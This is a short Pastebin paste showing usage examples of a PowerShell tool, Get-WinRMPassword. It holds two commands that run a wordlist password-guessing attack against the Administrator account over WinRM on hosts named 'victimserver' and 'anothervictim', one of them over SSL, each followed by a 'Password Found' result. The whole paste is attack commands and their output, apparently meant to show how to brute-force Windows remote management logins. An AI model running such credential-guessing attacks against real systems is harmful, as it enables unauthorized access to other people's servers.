kjacobsen

Get-WinRMPassword examples

Mar 19th, 2014
2,443
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. C:\>Get-WinRMPassword -UserName Administrator -ComputerName victimserver -WordList c:\mywordlist.txt
  2. "Password Found: password"
  3.  
  4. C:\>Get-WinRMPassword -UserName Administrator -ComputerName anothervictim -WordList c:\mywordlist.txt -UseSSL
  5. "Password Found: letME1n123"
Advertisement
Add Comment
Please, Sign In to add comment